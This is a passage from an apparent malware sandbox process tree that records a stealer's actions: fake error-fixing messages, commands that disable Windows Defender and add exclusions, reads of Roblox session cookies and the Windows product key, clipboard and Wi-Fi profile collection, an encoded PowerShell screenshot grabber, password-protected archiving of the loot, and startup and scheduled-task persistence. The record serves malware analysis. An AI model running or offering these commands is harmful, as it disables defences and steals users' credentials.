        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        6⤵
        
        PID:5376
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        7⤵
        
        PID:4732
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:5744
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:5680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        6⤵
        
        PID:5768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:6128
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:5844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        6⤵
        
        PID:5700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        7⤵
        
        PID:5472
- - C:\Windows\system32\timeout.exe
    timeout /t 10
    3⤵
    - Delays execution with timeout.exe
    PID:4852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Scanning for errors...' -ForegroundColor Yellow"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5848
- - C:\Windows\system32\timeout.exe
    timeout /t 10
    3⤵
    - Delays execution with timeout.exe
    PID:5152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host '20 critical errors found...' -ForegroundColor Red"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5868
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:4768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Attempting to fix errors. Do not close the terminal or turn off the PC to avoid complications...' -ForegroundColor Yellow"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5036
- - C:\Windows\system32\timeout.exe
    timeout /t 60
    3⤵
    - Delays execution with timeout.exe
    PID:560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Troubleshoot process completed successfully....' -ForegroundColor Green"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4712
- - C:\Windows\system32\timeout.exe
    timeout /t 05
    3⤵
    - Delays execution with timeout.exe
    PID:3296
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:5292
- C:\Users\Public\jsc.exe
  C:\Users\Public\jsc.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4244
- - C:\Users\Admin\AppData\Local\Temp\xtpxfq.exe
    "C:\Users\Admin\AppData\Local\Temp\xtpxfq.exe"
    3⤵
    - Executes dropped EXE
    PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\xtpxfq.exe
      "C:\Users\Admin\AppData\Local\Temp\xtpxfq.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4156
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xtpxfq.exe'"
        5⤵
        
        PID:3608
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xtpxfq.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:3060
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        5⤵
        
        PID:2032
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        5⤵
        
        PID:3548
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1544
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()""
        5⤵
        
        PID:5828
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()"
        6⤵
        
        PID:1800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‌.scr'"
        5⤵
        
        PID:4396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‌.scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5932
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:444
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5608
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5164
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:6028
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:4012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:2620
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:4100
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5748
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5256
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:3068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4828
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2452
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:1600
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:4972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:4836
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:1016
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q55qq2bw\q55qq2bw.cmdline"
        7⤵
        
        PID:1104
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAC.tmp" "c:\Users\Admin\AppData\Local\Temp\q55qq2bw\CSCEE25683C726E4DA7803872CBAB726BED.TMP"
        8⤵
        
        PID:5848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2692
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3452
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2416
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5508
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:3348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5868
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5196
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6068
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3948
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:4024
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:5256
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:5388
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:2288
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44842\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\3BBsH.zip" *"
        5⤵
        
        PID:1192
      - C:\Users\Admin\AppData\Local\Temp\_MEI44842\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI44842\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\3BBsH.zip" *
        6⤵
        Executes dropped EXE
        
        PID:4416
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:1432
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:5900
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:3312
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5604
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:3984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:5804
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2152
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:4368
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:4844
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:4740
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        
        PID:5876
- - C:\Users\Admin\AppData\Local\Temp\betots.exe
    "C:\Users\Admin\AppData\Local\Temp\betots.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    PID:872
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "notepad" /tr "C:\Users\Admin\AppData\Roaming\notepad.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1060
- C:\l\wts.exe
  "C:\l\wts.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
